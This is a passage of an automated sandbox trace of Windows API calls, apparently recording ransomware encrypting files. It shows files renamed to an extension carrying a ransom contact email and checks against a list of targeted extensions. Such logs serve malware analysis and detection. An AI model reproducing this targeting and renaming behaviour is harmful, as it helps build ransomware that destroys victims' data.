Shared\\ink\\micaut.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0269.330] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0269.343] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0269.347] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\IACOM2.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\iacom2.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0269.348] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mso.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mso.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0269.351] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msores.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msores.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0269.569] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetup.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OSETUP.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\osetup.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0269.807] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\prjres.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\prjres.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0269.810] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\riched20.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\riched20.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0269.814] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppcext.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppcext.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0269.814] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0269.816] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppsvc.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppsvc.exe.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0272.021] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0272.021] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\iecompat.dll" (normalized: "c:\\program files\\internet explorer\\iecompat.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0272.172] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x34cff1c | out: lpFileSize=0x34cff1c*=7680) returned 1 [0272.172] CloseHandle (hObject=0x31c) returned 1 [0272.172] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\iecompat.dll" (normalized: "c:\\program files\\internet explorer\\iecompat.dll")) returned 0x20 [0272.173] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\iecompat.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\internet explorer\\iecompat.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.173] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\iecompat.dll" (normalized: "c:\\program files\\internet explorer\\iecompat.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.173] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\iecompat.dll") returned 47 [0272.173] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\iecompat.dll") returned 47 [0272.173] lstrlenW (lpString=".doc") returned 4 [0272.173] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0272.173] lstrlenW (lpString=".docx") returned 5 [0272.173] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0272.173] lstrlenW (lpString=".pdf") returned 4 [0272.173] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0272.173] lstrlenW (lpString=".xls") returned 4 [0272.173] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0272.173] lstrlenW (lpString=".xlsx") returned 5 [0272.173] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0272.173] lstrlenW (lpString=".ppt") returned 4 [0272.173] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0272.173] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\iecompat.dll") returned 47 [0272.173] lstrlenW (lpString=".zip") returned 4 [0272.173] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0272.173] lstrlenW (lpString=".rar") returned 4 [0272.173] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0272.173] lstrlenW (lpString=".bz2") returned 4 [0272.173] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0272.173] lstrlenW (lpString=".7z") returned 3 [0272.174] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0272.174] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\iecompat.dll") returned 47 [0272.174] lstrlenW (lpString=".dbf") returned 4 [0272.174] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0272.174] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\iecompat.dll") returned 47 [0272.174] lstrlenW (lpString=".1cd") returned 4 [0272.174] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0272.174] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\iecompat.dll") returned 47 [0272.174] lstrlenW (lpString=".jpg") returned 4 [0272.174] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0272.174] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\iecompat.dll") returned 47 [0272.174] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\iecompat.dll") returned 47 [0272.174] lstrlenW (lpString=".doc") returned 4 [0272.174] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0272.174] lstrlenW (lpString=".docx") returned 5 [0272.174] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0272.174] lstrlenW (lpString=".pdf") returned 4 [0272.174] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0272.174] lstrlenW (lpString=".xls") returned 4 [0272.174] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0272.174] lstrlenW (lpString=".xlsx") returned 5 [0272.174] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0272.174] lstrlenW (lpString=".ppt") returned 4 [0272.174] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0272.174] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\iecompat.dll") returned 47 [0272.174] lstrlenW (lpString=".zip") returned 4 [0272.174] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0272.174] lstrlenW (lpString=".rar") returned 4 [0272.174] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0272.174] lstrlenW (lpString=".bz2") returned 4 [0272.174] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0272.174] lstrlenW (lpString=".7z") returned 3 [0272.174] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0272.175] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\iecompat.dll") returned 47 [0272.175] lstrlenW (lpString=".dbf") returned 4 [0272.175] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0272.175] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\iecompat.dll") returned 47 [0272.175] lstrlenW (lpString=".1cd") returned 4 [0272.175] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0272.175] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\iecompat.dll") returned 47 [0272.175] lstrlenW (lpString=".jpg") returned 4 [0272.175] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0272.175] lstrcmpiW (lpString1=".exe", lpString2=".dqb") returned 1 [0272.175] lstrlenW (lpString="iexplore.exe") returned 12 [0272.175] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0272.175] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x34cff1c | out: lpFileSize=0x34cff1c*=695056) returned 1 [0272.175] CloseHandle (hObject=0x31c) returned 1 [0272.175] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe")) returned 0x20 [0272.175] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\iexplore.exe.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\internet explorer\\iexplore.exe.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.175] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.175] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\iexplore.exe") returned 47 [0272.175] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\iexplore.exe") returned 47 [0272.175] lstrlenW (lpString=".doc") returned 4 [0272.175] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0272.175] lstrlenW (lpString=".docx") returned 5 [0272.176] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0272.176] lstrlenW (lpString=".pdf") returned 4 [0272.176] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0272.176] lstrlenW (lpString=".xls") returned 4 [0272.176] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0272.176] lstrlenW (lpString=".xlsx") returned 5 [0272.176] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0272.176] lstrlenW (lpString=".ppt") returned 4 [0272.176] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0272.176] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\iexplore.exe") returned 47 [0272.176] lstrlenW (lpString=".zip") returned 4 [0272.176] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0272.176] lstrlenW (lpString=".rar") returned 4 [0272.176] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0272.176] lstrlenW (lpString=".bz2") returned 4 [0272.176] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0272.176] lstrlenW (lpString=".7z") returned 3 [0272.176] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0272.176] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\iexplore.exe") returned 47 [0272.176] lstrlenW (lpString=".dbf") returned 4 [0272.176] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0272.176] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\iexplore.exe") returned 47 [0272.176] lstrlenW (lpString=".1cd") returned 4 [0272.176] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0272.176] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\iexplore.exe") returned 47 [0272.176] lstrlenW (lpString=".jpg") returned 4 [0272.176] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0272.176] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\iexplore.exe") returned 47 [0272.176] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\iexplore.exe") returned 47 [0272.176] lstrlenW (lpString=".doc") returned 4 [0272.176] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0272.176] lstrlenW (lpString=".docx") returned 5 [0272.177] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0272.177] lstrlenW (lpString=".pdf") returned 4 [0272.177] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0272.177] lstrlenW (lpString=".xls") returned 4 [0272.177] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0272.177] lstrlenW (lpString=".xlsx") returned 5 [0272.177] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0272.177] lstrlenW (lpString=".ppt") returned 4 [0272.177] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0272.177] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\iexplore.exe") returned 47 [0272.177] lstrlenW (lpString=".zip") returned 4 [0272.177] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0272.177] lstrlenW (lpString=".rar") returned 4 [0272.177] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0272.177] lstrlenW (lpString=".bz2") returned 4 [0272.177] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0272.177] lstrlenW (lpString=".7z") returned 3 [0272.177] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0272.177] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\iexplore.exe") returned 47 [0272.177] lstrlenW (lpString=".dbf") returned 4 [0272.177] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0272.177] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\iexplore.exe") returned 47 [0272.177] lstrlenW (lpString=".1cd") returned 4 [0272.177] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0272.177] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\iexplore.exe") returned 47 [0272.177] lstrlenW (lpString=".jpg") returned 4 [0272.177] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0272.177] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0272.177] lstrlenW (lpString="jsdbgui.dll") returned 11 [0272.178] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\jsdbgui.dll" (normalized: "c:\\program files\\internet explorer\\jsdbgui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0272.178] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x34cff1c | out: lpFileSize=0x34cff1c*=505344) returned 1 [0272.178] CloseHandle (hObject=0x31c) returned 1 [0272.178] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\jsdbgui.dll" (normalized: "c:\\program files\\internet explorer\\jsdbgui.dll")) returned 0x20 [0272.178] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\jsdbgui.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\internet explorer\\jsdbgui.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.178] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\jsdbgui.dll" (normalized: "c:\\program files\\internet explorer\\jsdbgui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.178] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsdbgui.dll") returned 46 [0272.178] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsdbgui.dll") returned 46 [0272.178] lstrlenW (lpString=".doc") returned 4 [0272.178] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0272.178] lstrlenW (lpString=".docx") returned 5 [0272.178] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0272.178] lstrlenW (lpString=".pdf") returned 4 [0272.178] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0272.178] lstrlenW (lpString=".xls") returned 4 [0272.178] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0272.178] lstrlenW (lpString=".xlsx") returned 5 [0272.178] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0272.178] lstrlenW (lpString=".ppt") returned 4 [0272.178] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0272.178] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsdbgui.dll") returned 46 [0272.178] lstrlenW (lpString=".zip") returned 4 [0272.178] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0272.178] lstrlenW (lpString=".rar") returned 4 [0272.178] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0272.178] lstrlenW (lpString=".bz2") returned 4 [0272.178] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0272.179] lstrlenW (lpString=".7z") returned 3 [0272.179] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0272.179] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsdbgui.dll") returned 46 [0272.179] lstrlenW (lpString=".dbf") returned 4 [0272.179] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0272.179] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsdbgui.dll") returned 46 [0272.179] lstrlenW (lpString=".1cd") returned 4 [0272.179] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0272.179] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsdbgui.dll") returned 46 [0272.179] lstrlenW (lpString=".jpg") returned 4 [0272.179] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0272.179] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsdbgui.dll") returned 46 [0272.179] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsdbgui.dll") returned 46 [0272.179] lstrlenW (lpString=".doc") returned 4 [0272.179] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0272.179] lstrlenW (lpString=".docx") returned 5 [0272.179] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0272.179] lstrlenW (lpString=".pdf") returned 4 [0272.179] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0272.179] lstrlenW (lpString=".xls") returned 4 [0272.179] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0272.179] lstrlenW (lpString=".xlsx") returned 5 [0272.179] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0272.179] lstrlenW (lpString=".ppt") returned 4 [0272.179] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0272.179] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsdbgui.dll") returned 46 [0272.179] lstrlenW (lpString=".zip") returned 4 [0272.179] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0272.179] lstrlenW (lpString=".rar") returned 4 [0272.179] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0272.179] lstrlenW (lpString=".bz2") returned 4 [0272.179] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0272.179] lstrlenW (lpString=".7z") returned 3 [0272.180] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0272.180] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsdbgui.dll") returned 46 [0272.180] lstrlenW (lpString=".dbf") returned 4 [0272.180] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0272.180] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsdbgui.dll") returned 46 [0272.180] lstrlenW (lpString=".1cd") returned 4 [0272.180] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0272.180] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsdbgui.dll") returned 46 [0272.180] lstrlenW (lpString=".jpg") returned 4 [0272.180] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0272.180] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0272.180] lstrlenW (lpString="jsdebuggeride.dll") returned 17 [0272.180] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll" (normalized: "c:\\program files\\internet explorer\\jsdebuggeride.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0272.180] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x34cff1c | out: lpFileSize=0x34cff1c*=144896) returned 1 [0272.180] CloseHandle (hObject=0x31c) returned 1 [0272.180] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll" (normalized: "c:\\program files\\internet explorer\\jsdebuggeride.dll")) returned 0x20 [0272.180] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\internet explorer\\jsdebuggeride.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.180] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll" (normalized: "c:\\program files\\internet explorer\\jsdebuggeride.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.180] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll") returned 52 [0272.180] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll") returned 52 [0272.180] lstrlenW (lpString=".doc") returned 4 [0272.181] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0272.181] lstrlenW (lpString=".docx") returned 5 [0272.181] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0272.181] lstrlenW (lpString=".pdf") returned 4 [0272.181] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0272.181] lstrlenW (lpString=".xls") returned 4 [0272.181] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0272.181] lstrlenW (lpString=".xlsx") returned 5 [0272.181] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0272.181] lstrlenW (lpString=".ppt") returned 4 [0272.181] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0272.181] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll") returned 52 [0272.181] lstrlenW (lpString=".zip") returned 4 [0272.181] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0272.181] lstrlenW (lpString=".rar") returned 4 [0272.181] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0272.181] lstrlenW (lpString=".bz2") returned 4 [0272.181] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0272.181] lstrlenW (lpString=".7z") returned 3 [0272.181] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0272.181] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll") returned 52 [0272.181] lstrlenW (lpString=".dbf") returned 4 [0272.181] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0272.181] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll") returned 52 [0272.181] lstrlenW (lpString=".1cd") returned 4 [0272.181] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0272.181] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll") returned 52 [0272.181] lstrlenW (lpString=".jpg") returned 4 [0272.181] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0272.181] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll") returned 52 [0272.181] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll") returned 52 [0272.181] lstrlenW (lpString=".doc") returned 4 [0272.181] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0272.182] lstrlenW (lpString=".docx") returned 5 [0272.182] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0272.182] lstrlenW (lpString=".pdf") returned 4 [0272.182] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0272.182] lstrlenW (lpString=".xls") returned 4 [0272.182] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0272.182] lstrlenW (lpString=".xlsx") returned 5 [0272.182] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0272.182] lstrlenW (lpString=".ppt") returned 4 [0272.182] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0272.182] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll") returned 52 [0272.182] lstrlenW (lpString=".zip") returned 4 [0272.182] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0272.182] lstrlenW (lpString=".rar") returned 4 [0272.182] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0272.182] lstrlenW (lpString=".bz2") returned 4 [0272.182] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0272.182] lstrlenW (lpString=".7z") returned 3 [0272.182] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0272.182] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll") returned 52 [0272.182] lstrlenW (lpString=".dbf") returned 4 [0272.182] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0272.182] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll") returned 52 